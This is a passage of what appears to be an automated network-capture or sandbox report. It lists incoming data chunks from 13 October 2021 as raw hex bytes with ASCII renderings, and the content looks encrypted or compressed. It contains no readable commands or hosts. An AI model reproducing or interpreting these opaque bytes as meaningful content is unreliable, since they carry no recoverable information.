2021-10-13 11:06:38 UTC	147	IN	Data Raw: b3 2a 02 37 83 f6 14 b9 81 99 25 2b 96 98 39 aa 0f 62 97 8b 35 4a fb 55 1f 4b 10 d5 e5 55 e8 41 ac ba 3f e2 1e 25 12 11 e1 20 fb 8f e3 61 2b 8f 45 1c 3b be 1b 2f ca c9 63 74 7d 8f bb 42 d0 3c 80 7a 23 0a f5 ee 4f 26 33 3f 6d da 58 77 47 2c 06 86 61 c0 05 e0 21 75 cf 3c 29 8c 89 d5 f5 68 e3 24 a9 84 8d 53 2a ad 9c 35 11 b3 84 83 fa 7a fd bd 80 46 ce 7b 9f 22 6d 94 86 6e a2 d2 a4 f6 b2 4c 06 db 78 eb 4a 87 83 ae 00 5b 8f e7 d8 05 f3 cb ee bb 15 e8 38 5c 7e 10 cb e6 6b 26 ac b3 7f 18 2f 45 c0 db be f3 b5 a8 89 5e c9 92 48 bb b7 66 9f 40 92 2d 88 d6 4f 65 18 db 1c 30 af 25 53 3b f3 d8 b0 45 37 bf 3d 38 96 f2 43 32 ae 6d c8 f1 24 92 22 22 4d 2a a2 e1 02 94 7a c2 b1 90 22 32 96 99 73 e4 1f 9c b1 ac 32 f1 99 d2 63 c8 65 ac a6 02 58 a5 16 2b d6 4e c2 a7 8c 07 a1 Data Ascii: 7%+9b5JUKUA?% a+E;/ct}B<z#O&3?mXwG,a!u<)h$S5zF{"mnLxJ[8\~k&/E^Hf@-Oe0%S;E7=8C2m$""M*z"2s2ceX+N
2021-10-13 11:06:38 UTC	148	IN	Data Raw: c1 df 76 49 19 79 eb af 3e cd ea ca 9a 8b ab c0 80 a6 83 64 b5 82 c6 e9 57 2e 89 0c e9 f0 fe 45 27 49 a6 db 58 82 a9 07 f1 00 fd 80 00 71 23 1b cf 60 cf 1d a3 00 98 c6 79 75 a3 e6 cf ee 0e 52 8d 4c 17 a1 20 79 62 33 e2 c3 41 1f b6 4d 66 7a 0c b6 3e ec ee 67 71 8c bf 07 1c 8a 59 62 88 9e 0d 77 2d cd ed 98 1c e2 03 ad 51 47 ad f1 80 77 23 43 8b cb 9b 3b 20 7d 40 cc 7f cf 8e a1 54 06 68 a7 c7 66 96 99 66 7d dd ff 68 62 9f 38 7a 37 e1 a7 3b 25 89 5a d2 b8 44 bb fa 3b 43 10 6d 38 d6 bb 4c af d7 d5 d0 3d b7 03 da d2 78 2f 9b b9 5d 95 8a ad 5b b8 1e 19 e2 21 80 b4 0e c3 70 00 04 c7 2b b9 7f d7 a4 0e 07 09 60 9b a5 a5 d2 8b 55 2e a6 05 df a3 42 bb 7b 21 83 bb 5c cf 61 b4 f8 ef cc 4e 0d 40 4b 77 6b 26 1f 5d 87 be a3 d3 81 29 6f c9 f4 30 6b d6 9d 4f d4 02 44 78 de Data Ascii: vIy>dW.E'IXq#`yuRL yb3AMfz>gqYbw-QGw#C; }@Thff}hb8z7;%ZD;Cm8L=x/][!p+`U.B{!\aN@Kwk&])o0kODx
2021-10-13 11:06:38 UTC	150	IN	Data Raw: e1 20 c3 fa 1e 66 9d 49 e9 8b b8 3f 6f 19 2a 59 a6 a6 a6 74 c7 13 12 38 91 1b 94 c0 ab 96 18 19 33 e4 c4 a7 d7 f9 78 89 a7 eb e3 6c 85 ed d0 43 32 bc 0d 3b b8 aa 55 2f ba 30 6a 44 93 27 01 10 3a 5b 6e a1 d0 3b 56 59 95 31 b5 4e 2b b3 33 39 9d d0 6d 15 bf af 3f ee b0 97 98 a7 af 27 70 b1 ab 1a 6d d6 47 19 b0 32 d6 e5 4c e0 2c 83 ba 39 d7 93 73 a6 12 e1 22 f1 bf 9f f8 2a 15 64 11 2c 9b 3b 99 52 ec 4e 46 85 88 bd 41 c9 14 8d 37 0e 0c df 77 3e 97 1f 3d 69 fc c5 f7 39 b5 9d a3 48 f2 24 c3 96 77 55 19 24 7c 88 f5 f2 74 ea 0c a4 d8 a0 55 00 31 ca 81 12 b3 86 89 c0 06 64 bc 1a 67 c3 62 ba 02 d5 0c a3 43 93 1e a3 fe b1 52 2e d6 1c c6 4c ad 19 f8 b4 58 8f e5 d2 3a 8f 52 ef 21 34 e5 23 79 5e a9 53 c3 46 14 78 b4 76 1b 30 49 c8 9a 91 f3 b3 9d 3d 08 7d 91 48 b9 bd 5a Data Ascii: fI?oYt83xlC2;U/0jD':[n;VY1N+39m?'pmG2L,9s"d,;RNFA7w>=i9H$wU$\|tU1dgbCR.LX:R!4#y^SFxv0I=}HZ
2021-10-13 11:06:38 UTC	151	IN	Data Raw: bd 2f 13 53 d8 b0 27 9b 89 7a e6 66 4d 4d af 4d 38 86 25 3f 15 ea 6d 0c 03 76 13 ce de a6 73 8f 93 4c 44 ff f7 21 be 31 12 28 ff e3 c8 fa 0a 68 fd 5d 8f df 68 a7 29 d9 39 43 25 87 01 72 60 62 6a fc 46 3c 94 3a 42 2c b2 e7 ad b0 ad bc 91 63 19 4b 20 90 82 69 8b b2 bc 13 ff 2a 9d c1 c5 c4 8e f2 e3 ae 0b 1a 79 ec 05 a0 5e 96 2d 79 2e f7 81 2c f9 93 1f 89 72 c3 f4 73 62 cb 08 3a 72 84 39 a2 89 98 c7 2e fe 96 fe cf cb 3b cb a4 57 01 9c 21 0c 5e 20 ed c8 6f 36 a0 49 37 6a 9e ef 89 9f 87 62 4d 58 85 29 33 1e 5c 64 b8 c6 48 b0 24 c0 8e c6 5a d4 13 c5 3d 55 84 aa 94 47 14 b1 c3 6e d8 ae af 9b a8 c6 fe 4f 7d f8 b5 e0 a9 5e 2e 64 49 06 8c 92 53 14 fb 9c 50 ec 80 94 76 62 e5 c1 f3 c6 a8 7b a8 50 3c 2e ae ff 84 55 02 6d a9 7d 3d c4 2b d5 5d d0 5e 0c b5 f4 7a 42 92 3d Data Ascii: /S'zfMMM8%?mvsLD!1(h]h)9C%r`bjF<:B,cK i*y^-y.,rsb:r9.;W!^ o6I7jbMX)3\dH$Z=UGnO}^.dISPvb{P<.Um}=+]^zB=
2021-10-13 11:06:38 UTC	152	IN	Data Raw: 5e ac 21 46 29 e1 1c 46 ab c5 20 8b cc 61 94 54 ce 7b ee 6a 00 62 87 63 c2 33 f1 e7 b6 10 3b b0 e2 63 16 40 f3 c5 7d d7 64 31 99 95 6d be e9 c2 c4 c0 6d b8 1b 9b bb cd aa c0 fc cb 42 12 be bf da da 98 bd 2a 55 e9 46 1b 23 92 f8 93 a7 67 f8 d9 4f 01 c9 28 b6 fe d1 5d 64 0a 76 35 cd f2 5a 79 2e 70 6c 47 ca 48 dc fd 90 2e 68 0d 3f c5 f5 aa d4 f2 7a f7 8c dd eb 67 94 ed f5 76 77 8f 08 11 23 cb d8 3b bb 17 6e 66 e3 39 19 99 52 59 5e b5 d6 18 60 74 b4 2a b2 5a 1c 99 1c 07 a8 db 5f 26 81 bd 88 a5 19 4f 1d 68 49 e1 88 7e 65 60 9b 28 c5 ad 05 a4 1c 30 90 15 b4 79 69 ab 01 4d 8b 52 cf 31 f2 0a ff 45 89 cc f1 80 d1 c3 7e d6 74 7a 3c 8c 93 40 40 40 b0 3d a3 50 88 d2 f8 20 9a c6 4b 8b c2 8d 08 3f c4 c0 ab 17 62 e9 5b a4 4d 02 ff 4f b2 88 fa 08 5a 60 fe 53 dd 0c 16 0f Data Ascii: ^!F)F aT{jbc3;c@}d1mmBUF#gO(]dv5Zy.plGH.h?zgvw#;nf9RY^`tZ_&OhI~e`(0yiMR1E~tz<@@@=P K?b[MOZ`S
2021-10-13 11:06:38 UTC	153	IN	Data Raw: 50 5f 56 1a 1c 35 43 2d ae f1 0b 50 9c 2f 21 b1 2f a6 ca 0d 53 a3 df 6d 7d 65 95 b0 89 49 6c 8b 17 0a ad dd a9 d8 25 b8 dd 61 74 22 85 f0 2e 3d a1 6c 26 a3 a9 01 7b 0f f7 a2 ab cb 13 2e 06 ae 85 42 5e db 89 cf f8 bf a4 34 94 89 60 0b 8e b5 8d 19 34 e5 10 03 a6 33 ae c6 8d 71 f3 ab 5c fd f3 cb 73 d6 cb 9f a0 da 4e 40 22 d5 60 3d d3 c7 66 55 c1 03 92 ac ea 62 29 0a 3d f4 a4 70 da 59 00 bc 72 b0 64 e4 d0 fd 48 87 b1 19 19 4c 24 8a b8 10 aa c1 b4 3d 78 0c 09 5e 51 70 e2 dc de a9 4d 0d a0 4c 2b 1b 9f 76 ff 4c 19 73 78 63 49 37 72 9c 93 e2 63 87 28 c0 10 ab d3 d3 1e 56 f2 29 4c db 71 84 41 23 ef 8e 04 c5 bd ca 74 ea 06 58 06 11 ab 66 05 48 4b 0b ad 01 05 c4 81 59 ba 8a aa fa 61 54 a3 f9 64 80 eb e7 4d 0d 2e 24 0b ce f6 f5 07 f6 b3 b2 d0 f8 28 16 87 52 8d 67 59 Data Ascii: P_V5C-P/!/Sm}eIl%at".=l&{.B^4`43q\sN@"`=fUb)=pYrdHL$=x^QpML+vLsxcI7rc(V)LqA#tXfHKYaTdM.$(RgY
2021-10-13 11:06:38 UTC	155	IN	Data Raw: 51 b5 6e db 69 da f7 d4 3c cf e3 b8 ef 68 38 9f 6b 5f f3 cd 54 18 eb 8d af 10 5d 00 a3 83 b2 33 e6 cd e0 68 b8 b7 e8 01 91 49 90 28 75 c2 32 db 92 4b 8e 8b 82 0a 27 91 1d c5 ce a5 84 f2 b3 c0 0c 7e 59 63 88 75 d6 bc 0f a1 25 08 50 e1 34 a3 e9 b7 6c b4 f5 3e 61 b8 3a 42 ff 0e d5 65 c4 41 d9 e3 f7 78 d4 1d e0 37 04 71 d1 f4 5e 2d a8 d5 a3 62 43 42 e2 3e b6 7d 6f ac 6e 37 0f 6c 15 bb 66 f4 08 10 0a 14 5a 71 5c d8 b3 12 5c 3e 1c 5e 6f fd 93 54 e2 ba b1 00 22 34 0a cb 78 40 a5 dc 10 e6 75 4d 04 89 e9 ed 81 f0 13 52 8e a6 f9 ac b4 9d 1f b7 3b 6d 05 a3 e6 9f fa 18 5f 20 58 7e f7 3f 2c 01 50 ec 02 27 50 f6 bd 30 80 83 be 43 1c 9c 3e a6 da d0 34 98 a0 22 bd 88 85 7e 77 ce a6 dc 63 fb 1d 90 c5 5c d9 c5 2e 14 f5 e5 53 15 2c 77 d2 74 7c 40 9c 3b 6c aa c3 96 5d ef 31 Data Ascii: Qni<h8k_T]3hI(u2K'~Ycu%P4l>a:BeAx7q^-bCB>}on7lfZq\\>^oT"4x@uMR;m_ X~?,P'P0C>4"~wc\.S,wt\|@;l]1
2021-10-13 11:06:38 UTC	156	IN	Data Raw: d7 3b f3 cf d2 93 2d 33 4c 01 6a 43 fb 72 d8 61 82 ad d4 6e 2b d4 6c 06 fa f9 fe 62 7f 56 fe b0 31 6b 67 0f 40 be 8e ca 1e b7 01 36 8c b4 75 13 d9 e5 34 c7 53 b2 c5 df 1d ab c0 d3 e2 a6 c2 92 87 21 51 25 76 0f fa fe fb 88 b4 07 b2 f8 c4 c3 c0 df bc fd af 3b 2d c5 c2 04 a1 58 8f 42 39 48 80 dd 2d 1d a0 b3 a2 17 24 65 8c b2 59 82 bf 76 55 71 07 ab 07 4d f7 a3 ed 5b 34 d3 dd 15 e1 ad 3b 37 95 b9 fd 29 70 6d 5d 87 f3 df 72 55 df c2 1b 13 1b 3e 30 74 86 17 5f ac 80 78 57 39 92 fc 26 d0 9a 2a e4 5e 0b 59 b5 60 2c 85 0b 3c 17 fe 64 06 09 63 1b d6 c9 f4 0e f5 a9 21 4b d4 c1 07 88 0d 2d 7c ed fa d8 f6 37 61 ce 55 95 d9 6b ac 3e c6 3a 44 3c 8f 11 28 91 8b 92 0a e6 c4 89 07 16 33 a2 ea 9b 99 92 92 a7 23 00 53 32 94 db 7c dd fb f4 0a e5 27 dd 99 bb ef a6 ae 9c da 3a Data Ascii: ;-3LjCran+lbV1kg@6u4S!Q%v;-XB9H-$eYvUqM[4;7)pm]rU>0t_xW9&*^Y`,<dc!K-\|7aUk>:D<(3#S2\|':
2021-10-13 11:06:38 UTC	157	IN	Data Raw: f7 ce 2f bb dc 1b 75 2c 81 b7 1c 1e 73 0c 14 4a 28 a1 5b ca a3 e6 16 17 76 b6 8a c3 80 c6 64 3f 9f 2f c4 a6 59 90 d6 67 0e a2 67 ed 6e 70 98 ef e3 fb 00 4f 7d 60 4d c3 16 69 b8 b3 1e e3 87 2a 7b f3 e3 0c 5a eb 69 46 30 1c db 8b 30 dc 34 e1 0c e0 43 6c 4a 84 6d 67 33 6d df fe 36 f0 90 22 0d 9a c1 20 27 15 c9 e9 af 7f 36 3f ba 74 4d 56 d1 36 6d 20 df 7c ef 07 a8 e6 72 81 5f 46 9d 2b 4d 2e 8d 90 33 93 4f 45 20 03 23 08 7e a3 e7 da cd 34 c3 76 06 91 23 b3 db f0 5f 84 3d 4b 2f ef 20 7a bb f3 1d b5 f4 53 af 4d d3 74 c8 52 37 47 92 67 db 17 fe d9 af 4a 2c 81 f6 40 21 49 f6 d5 a1 1b af de 73 68 4f 82 c7 ec fb f0 55 9a 0c f4 b7 c3 8d c1 e4 c0 7d 17 b6 98 8a 90 db f9 6b 30 81 4c 37 0c bf e8 91 af 7a b1 87 65 05 c2 01 a4 ed cd 57 1c 76 59 33 d7 fd 4a 60 6f 7a 77 5a Data Ascii: /u,sJ([vd?/YggnpO}`Mi*{ZiF004ClJmg3m6" '6?tMV6m \|r_F+M.3OE #~4v#_=K/ zSMtR7GgJ,@!IshOU}k0L7zeWvY3J`ozwZ
2021-10-13 11:06:38 UTC	159	IN	Data Raw: 65 32 14 c4 8f 2e 94 a1 81 76 40 de 96 3a 7a ed 70 ac 1f f5 bc bf 5b a0 0a a7 ec b4 73 19 c3 47 dc 6d af 1c e3 bc 65 bd da c5 ba d4 fa cd e2 fe 1a c6 ac 94 66 11 30 a9 c4 93 57 90 f7 d0 aa 0c 0d 50 1f 5e 7b fc c6 bc 76 aa 4c 72 34 7b a5 7f 4b 53 14 a0 aa e9 a2 f8 c2 41 e5 45 e0 2a 04 5b ac eb 6d c9 c8 51 1c 65 f2 97 bc 30 19 fc a2 a2 a6 f4 3f 1c 48 a1 03 cd f6 20 17 a2 93 28 17 e5 7d 90 01 3a 21 9b 6a 1e 7c 61 21 67 0a 27 a3 c1 b4 81 b5 6b 77 4d 3a 3c 8c 60 4e 1d 5d 59 46 09 60 26 ac ac 5c 55 99 1b c2 0a db 5b 00 c4 71 f1 85 30 36 3a 91 88 cd 16 26 ca 2e 02 f3 d5 f4 83 28 b0 9d 5d 29 78 80 ea 5a 5b c7 09 45 dc 9c 33 23 5f b7 fd f8 cf 28 73 4b ff c9 7b 5e b7 91 96 b2 a6 ab 20 99 e1 1b 08 f8 ce f2 29 59 de 08 0f bd 34 de aa d4 28 f8 b9 1e a5 e1 98 66 ed a7 Data Ascii: e2.v@:zp[sGmef0WP^{vLr4{KSAE*[mQe0?H (}:!j\|a!g'kwM:<`N]YF`&\U[q06:&.(])xZ[E3#_(sK{^ )Y4(f
2021-10-13 11:06:38 UTC	160	IN	Data Raw: b1 78 fb 21 9b 65 73 aa a4 9a 4a 19 50 23 94 0d 0e 10 5b 56 1b 49 06 46 fc ad eb a1 03 20 68 58 57 e9 d1 0e 05 be bd 49 e1 8a c9 39 39 ba 9f 94 ba d0 30 da 29 41 7b e8 e8 85 5f 0f 6d bc 79 10 97 69 99 18 89 10 5c ca 95 4d 59 83 52 74 4b ab 22 40 9f 98 d1 67 34 a0 be bb af 88 d2 86 05 fd 2d 04 7b 90 8c fc 7f 13 12 42 16 c1 c8 4f a9 5a 21 dc 09 69 95 d3 5f e4 77 fa f1 5b 44 3f 2a 8f cc ef f6 b2 3c f7 e3 3d 32 8e 18 0d 94 cc 52 78 8b 9a 44 12 76 08 c2 0b 22 d3 13 ac 6e 9d 7c d7 fc c8 7b d9 e0 ab bc 11 74 83 3c 5e ac c5 58 6c 9d e1 c0 69 5f 21 ab 86 a0 2f ec d6 df 40 ff ae f6 19 8d 33 aa 77 22 da 45 8f b8 1d d8 e5 f1 5e 6c bb 0b ba ea 85 a4 da 9f d2 04 5e 09 43 8d 72 e3 a4 0b ae 25 1b 5b e8 2e ad c3 9a 6f 8c d4 1f 79 9a 20 62 cb 24 f2 6f f3 4b c3 ab cc 22 e1 Data Ascii: x!esJP#[VIF hXWI990)A{_myi\MYRtK"@g4-{BOZ!i_w[D?*<=2RxDv"n\|{t<^Xli_!/@3w"E^l^Cr%[.oy b$oK"
2021-10-13 11:06:38 UTC	161	IN	Data Raw: fe 5e ec 08 28 95 0b a0 60 52 cf 2a 56 9f 53 c7 3c f9 28 e7 3e 9d fd c2 a2 e5 ef 5c ee 18 77 77 db ef 1e 1f 1a ac 72 f3 48 d4 91 bd 63 da 86 1d c9 c3 c6 48 42 df e5 87 38 50 e3 74 85 67 48 f9 70 bc 89 cf 25 55 63 e7 30 a4 0c 12 1d d1 94 b7 7f 26 a1 2a 2b 37 de b8 3f 13 ae f5 64 fa 31 a6 7c 2d 2c f2 2b 87 28 54 1e dd 9d 5c dc 4b e4 17 bb 6a 76 b3 6a 5f 49 42 11 7f 0d c3 c9 24 39 33 10 ad 85 f8 23 1c 51 d4 3d 00 2f 0f af e6 b1 ac bf 8d 53 67 5e 9e 4a bc 91 dc 9e 41 97 c0 c2 82 3e 2f 5a 0b 66 1d e9 44 9d 2d c5 ef 9b 79 35 bb 07 10 a0 ff ec 71 0d 37 b9 97 7a 12 14 41 42 a9 9c cc 11 b3 16 26 fd d3 2c 12 83 bf 61 e4 5a 8a 98 8c 2b a3 8c f7 f3 a0 fe f5 85 1f 67 02 31 17 be f9 c8 b1 b3 0e a2 fe 96 94 d9 c7 b8 d6 ab 25 15 fd ee 2d 8d 6c ab 72 90 a2 60 6a dd d2 f5 Data Ascii: ^(`RVS<(>\wwrHcHB8PtgHp%Uc0&+7?d1\|-,+(T\Kjvj_IB$93#Q=/Sg^JA>/ZfD-y5q7zAB&,aZ+g1%-lr`j
2021-10-13 11:06:38 UTC	162	IN	Data Raw: ee b8 d0 2d de 4f a4 7a 46 30 d7 9b 11 67 e2 9c f1 5d 7e 49 9f 15 65 dc 94 2a c1 97 a9 91 46 e6 34 cf 5c 29 74 24 45 61 49 c8 a9 0b 05 01 18 5a 7c ca 9f 15 c8 9e 91 34 4c 21 05 99 34 2f f7 82 40 b8 3e 77 1a ed b7 d4 c0 b1 50 62 ca e8 97 ea e5 d5 4a ca 6a 34 55 dc c1 cc d2 3b 04 1f 73 73 f9 2c 79 64 6e e8 14 5e 7c eb a4 3e 9c 87 ff 46 5a b1 2b 8a d5 de 0d a1 9f 0f aa ee e6 14 53 93 e8 e2 3a aa 3f c1 87 5b 8d 8a 10 55 de be 17 10 00 24 92 08 27 1d 32 84 cd 14 3e 38 f2 48 16 73 cd 6c 9a be 09 82 20 a6 ef 6b 8b c9 11 cf 47 bf 5d 81 64 b1 28 78 53 10 6e 75 c8 65 ca 88 b1 09 28 c3 c9 da 65 b4 77 dd 0b 55 65 aa 08 44 d7 46 51 19 80 95 1b 14 5f e2 d6 4c 90 70 8a d4 76 cf 3d 09 6d ae d5 f5 7b ea 0c 84 f0 b9 7b 30 01 d1 9c 23 82 b9 a3 42 78 fd b9 1a 03 e3 6a b9 ae Data Ascii: -OzF0g]~Ie*F4\)t$EaIZ\|4L!4/@>wPbJj4U;ss,ydn^\|>FZ+S:?[U$'2>8Hsl kG]d(xSnue(ewUeDFQ_Lpv=m{{0#Bxj
2021-10-13 11:06:38 UTC	163	IN	Data Raw: bc 2f 0d c5 6b 6d b2 d0 cf a8 5c 74 b7 74 2f a1 99 a9 1e 71 5a 99 2e 7c 23 ff 3d 4d 48 89 a7 4e 57 cd 74 44 9d e0 3d bb bc 76 17 35 9b 88 32 06 3e cc e2 ee d8 db e3 dc 8b 65 6a 8b cc a2 5c 12 f7 10 13 9e 61 c7 82 db 3c ea 11 0a b6 a9 32 68 51 95 99 ee d9 57 e0 20 c4 2a eb e2 1c 48 7a af 19 a1 72 cf 28 56 ba 45 83 d0 51 e1 d5 7a 8a 22 92 7e 86 dd ab 04 a6 88 48 08 f8 9a 41 7f 4d 60 f0 61 e9 b6 7e f3 1d fd e2 76 75 0d ac eb 84 3c 5c fc 5e 06 f3 32 da ae 1c b9 be b7 ec d1 cd 68 05 9b ba c5 5a e1 43 27 66 aa 4e 42 89 b4 31 c7 2d ff 2f 04 45 80 65 56 73 cf 1d 95 d0 b3 d4 79 5c 9b c6 f4 da 2e 4c 92 41 3e 93 62 6f 43 3e d4 d8 69 2c a4 40 49 5a 8a e0 89 7a e9 69 51 c5 b1 90 1b 02 7c e0 b3 b5 04 b7 2f 29 eb 81 64 d7 03 8d 41 75 b6 da 82 58 05 1f 10 b3 02 8f 3a c7 Data Ascii: /km\tt/qZ.\|#=MHNWtD=v52>ej\a<2hQW *Hzr(VEQz"~HAM`a~vu<\^2hZC'fNB1-/EeVsy\.LA>boC>i,@IZziQ\|/)dAuX:
2021-10-13 11:06:38 UTC	164	IN	Data Raw: d8 48 94 ca b9 8e 4a 0d 86 ca 66 d0 4e 8b b8 ba 34 d4 d5 9b 05 ab db ef cd 09 88 6d a7 e5 f7 f7 bc d2 0f 3b 4a 29 65 ce a7 8f f3 b4 ae 2c 77 4d 76 81 a2 f0 1c 05 bf 29 57 68 6a 33 b1 c5 23 76 73 e8 b5 59 bc 13 65 de 24 d3 41 e8 70 eb 47 f7 9d d0 6c 8f 5c 68 22 a8 9d 36 5c d7 65 c7 e7 52 9a 8e 29 5e 98 e9 36 f6 a9 91 52 8f b0 f2 11 9c f2 9b b7 9e a4 80 13 7a 09 c0 4f ca 8c aa 3e 40 66 1b 60 4f f3 99 21 c7 b2 c0 fc 1e 66 bd 8e d3 8b b8 3c 47 d7 28 ed a1 89 20 0a 5e fd 11 3c b1 05 97 2e ab b5 3c 36 20 c2 e4 76 cd f9 78 a8 bb 28 e3 d7 9b fe f9 6e 30 a5 0f 11 3e d5 ce dc ba 8f 4b 42 91 27 01 87 04 76 7c 86 f2 c9 55 e2 94 13 9b 63 2b f0 28 28 b5 fc 6d ef b9 3e b8 92 29 96 98 43 90 22 73 ac ab 8a 49 40 54 3d 91 37 d5 72 4d c0 6c af b8 2f c9 40 5a 89 10 e1 24 cc Data Ascii: HJfN4m;J)e,wMv)Whj3#vsYe$ApGl\h"6\eR)^6RzO>@f`O!f<G( ^<.<6 vx(n0>KB'v\|Uc+((m>)C"sI@T=7rMl/@Z$
2021-10-13 11:06:38 UTC	166	IN	Data Raw: 4d 1f f3 33 a8 8d d9 c5 7a 3a 7c ca f4 04 39 2f 31 4f b1 87 ee 3a a2 58 78 b3 ec 24 87 8c b0 73 54 1c 0b 84 80 30 18 83 6d f8 b7 fc 6c 8c 16 7a 18 14 c3 fc c4 e5 8b 9e ec ae de b1 f4 f9 73 ad ee 92 0b 1e 43 ec 37 96 7e ba 99 ed 98 4f 0c b3 2b 64 7d 76 d0 f6 c8 77 79 8c 55 75 29 97 a4 c8 70 e4 c7 10 6f 2b d6 aa 9c 57 84 04 46 c0 f7 60 49 2c d5 93 3b a1 65 1f 2b 97 1e 01 4d f1 e9 ee ea d6 cb 49 f7 a0 26 76 9d ae 97 56 44 e3 03 03 e0 ed 7b 85 9b 38 a3 2f 07 b7 e9 92 20 6f 4b 9e ae 98 0e de 77 d1 6a 6a f9 e5 3d 6e bc 2d e7 0d 50 52 10 77 0e 03 c7 50 a5 2a 68 c1 6f 92 6d 82 a9 12 a0 b1 c0 3e 6f a7 a5 40 37 c9 26 ce bf fe fe de 8d 42 98 f3 3e 57 50 f3 35 83 74 d3 ea e6 61 f3 21 c3 d6 22 34 b9 fa 9c 90 f3 65 04 d6 34 9f ac 38 44 6a 77 ee 70 15 85 fb 3d 8f ad 09 Data Ascii: M3z:\|9/1O:Xx$sT0mlzsC7~O+d}vwyUu)po+WF`I,;e+MI&vVD{8/ oKwjj=n-PRwP*hom>o@7&B>WP5ta!"4e48Djwp=
2021-10-13 11:06:38 UTC	167	IN	Data Raw: 8c 82 fc 07 5f e0 2c d5 9b fe dd ca 1d 89 3d f1 f5 c4 55 f8 4a 36 ec dc 86 46 43 d6 b9 4c 22 29 78 76 07 cb 0a 1a 48 ab c8 b6 90 83 3c 5b b7 59 ce 62 c5 9b 9b 2a 04 47 6d f6 46 60 16 ca 3d bd f8 1d b4 84 bc ce e1 8a e2 dd 37 60 a9 58 bb 01 de 95 d8 bb e8 5e df c4 87 c5 97 bb af 0f d5 d3 e6 72 ba 16 b9 c3 9f 82 5f 8b b3 b3 e1 bb e1 52 6f 1b ed ea fc 89 d9 73 f9 f8 1c 5b 1b eb 77 74 c3 be 52 3d e7 50 5b d1 64 31 ad a8 46 88 be a5 a4 b7 20 4d d8 33 43 40 78 70 ed 90 60 0f e3 6c 89 5c 7f 02 8d 9f 30 41 13 b3 f5 72 55 38 c3 2e 6c e1 ec 36 00 a8 a3 87 89 2e 64 12 e2 ed 9d e6 1e a5 b9 0c 7c de d7 d7 f2 8c ac 3e 8e c4 2a 62 49 ee 0e ff 57 1d c7 f9 89 67 8f 5d c2 8b af 26 75 36 2e 59 64 8d 12 08 58 12 5f 3b 83 1a 91 c0 3c 0d 43 2b 27 c2 73 a5 ed fb 7e a9 ae c1 da Data Ascii: _,=UJ6FCL")xvH<[YbGmF`=7`X^r_Ros[wtR=P[d1F M3C@xp`l\0ArU8.l6.d\|>bIWg]&u6.YdX_;<C+'s~
2021-10-13 11:06:38 UTC	168	IN	Data Raw: 55 96 97 4e 15 39 52 fe be 52 2e f6 7a eb cc ad 14 f0 0e 5b 55 eb f4 bc f1 cb ee 21 b0 c5 3b 5a c9 a8 16 ee 67 06 5e 94 7f 18 b0 49 f9 d6 2b f2 56 8a 03 20 50 93 48 bf 17 dc 8b 60 05 b6 46 f3 51 43 38 61 1e 30 2f 05 bb 3c 64 d9 55 44 11 92 3f 38 90 d8 45 4c 21 4c 5f f4 00 20 30 22 4d b0 87 cc 90 b2 4c 59 24 91 29 1b 81 b1 73 e4 00 93 19 81 26 d1 08 f9 f5 bf ec ad 16 58 78 19 14 2b c7 d4 f0 8d 39 29 90 ce 2b aa f9 ef 8e fe 81 0a f9 f4 07 25 85 7f fe 04 e0 88 4d 0d a2 df 70 6e 92 d3 e7 9b ae 14 8e 54 75 a5 8e a9 20 67 62 83 35 7c b9 b5 aa 4a 42 89 17 47 91 c9 17 4d 3f d4 8b fe ae 76 1d 2a 86 a3 07 11 9a e1 ff c5 1e b8 4b f6 a0 48 69 8b 27 90 d6 30 f4 10 81 dd 6d ec 84 db 37 f5 38 11 e9 aa 9d 76 f3 e3 9f ee 86 58 48 3a 41 2b 99 f6 f2 40 14 de 2f b1 8d c7 45 Data Ascii: UN9RR.z[U!;Zg^I+V PH`FQC8a0/<dUD?8EL!L_ 0"MLY$)s&Xx+9)+%MpnTu gb5\|JBGM?v*KHi'0m78vXH:A+@/E
2021-10-13 11:06:38 UTC	169	IN	Data Raw: 76 1b ea ce d1 34 54 2b a6 16 e7 b9 b4 99 70 55 9c d3 37 6d a5 37 a6 8d e3 a7 3d 0f 0e 24 dc b8 38 b0 ff db fd 89 6d a2 f3 96 58 89 60 34 c1 3d 92 23 ff 63 78 2f 84 b5 31 ba a5 b9 4e 92 bd 67 7b 20 80 b0 2d 22 74 18 37 78 ff 96 48 f1 84 ef 05 09 63 bb 92 8d b5 80 e4 05 ab 28 dd a3 44 91 fa 5f 5c b9 01 c0 50 59 df ef cc d4 28 6d 59 51 0d c7 71 56 3c 91 13 f8 81 29 77 e1 da 32 6d c8 84 e8 5b 99 60 78 da 10 e0 2d dd 28 d7 ad fa 76 28 a6 c7 b7 0a 61 c9 22 4f ff 9e 4b 5e c0 a8 81 1e 0f 4b ca e8 d1 46 8a fe b9 4f d8 6e 94 51 a9 14 ef 43 08 80 6c a1 fd 00 d3 4d d0 5b 39 9b 29 eb cf a6 8f b5 b7 98 24 b5 42 4e 81 75 f0 92 04 be 29 11 6b a0 39 7e ca 8f 75 a4 e8 25 58 bd 13 27 dd 5f df 3d e7 48 eb fb 6d 0e d1 6e 8f 4d 70 3c 9a 1b 36 64 d7 06 e5 70 53 38 8e 2f 46 d0 Data Ascii: v4T+pU7m7=$8mX`4=#cx/1Ng{ -"t7xHc(D_\PY(mYQqV<)w2m[`x-(v(a"OK^KFOnQClM[9)$BNu)k9~u%X'_=HmnMp<6dpS8/F
2021-10-13 11:06:38 UTC	171	IN	Data Raw: c5 e8 71 20 3f 60 fd 2f 99 3b 99 c8 da 63 43 a4 1e bf 68 c9 08 ab 79 23 0c df 7b 31 7b 33 89 6d d0 ef c9 41 2d 9c a3 4c c1 23 72 93 87 de 16 09 dd a4 d4 f5 77 ea 1f 84 a6 bc a5 11 05 e2 08 02 b2 80 a3 42 6b fd 2a 1b d9 eb 40 b9 f6 c1 97 86 6e 82 2b 83 61 b3 ce 2a dc 7a d7 59 ac 05 d0 99 49 8f ae ff fc eb e1 ee 55 25 c4 2a 7a 5e ba c9 0b 6e f6 4f be 7f 4c 27 48 e8 f6 bc e0 b3 1d 0d fb 52 b9 48 df 8f dd 9d 40 92 a4 ad b6 5a d4 22 4b 1e e8 b6 04 ad 1c f3 cb af 77 0b 49 3d 12 90 80 df 4d 37 6c c8 e6 04 e0 22 ef 57 9a 87 54 0a b3 5a 79 b3 83 22 94 a0 41 62 ce 00 33 85 80 30 f1 9f eb e5 35 e8 76 a4 2c 78 79 09 2a d6 d4 e7 99 9e b6 80 be bb df f9 f3 90 ff 90 0a 1e f2 e1 30 92 8f ab 4e e0 d4 6e 0c b3 df 6d 7e 74 9c f1 2d 5e 5e 8e c0 50 a4 9f a9 ca 62 e4 70 26 6c Data Ascii: q 